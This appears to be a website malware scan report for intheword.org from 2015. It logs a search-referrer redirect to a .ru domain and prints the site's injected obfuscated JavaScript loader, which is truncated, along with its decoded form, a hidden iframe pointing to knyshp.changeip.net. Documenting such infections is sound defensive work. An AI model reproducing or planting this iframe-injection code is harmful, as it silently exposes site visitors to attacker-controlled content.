Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://intheword.org/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: intheword.org Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 16 Oct 2015 10:01:29 GMT Location: http://mediciron.ru/ Server: Apache/2.2 Content-Length: 271 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: X-Mapping-ahelpkbl=E398875A7747C0F48D9C27CE1BF426DC; path=/ | malicious |
Scanned pages/files
Request | Server response | Status |
http://intheword.org/ | 200 OK Content-Length: 3477 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';try{if(/12/.exec(23).index==0);}catch(qqq){s=String;}ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5, Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://knyshp.changeip.net/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://knyshp.changeip.net/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttri <iframe src='http://knyshp.changeip.net/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://intheword.org/coolRedirect.js | 200 OK Content-Length: 5715 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) |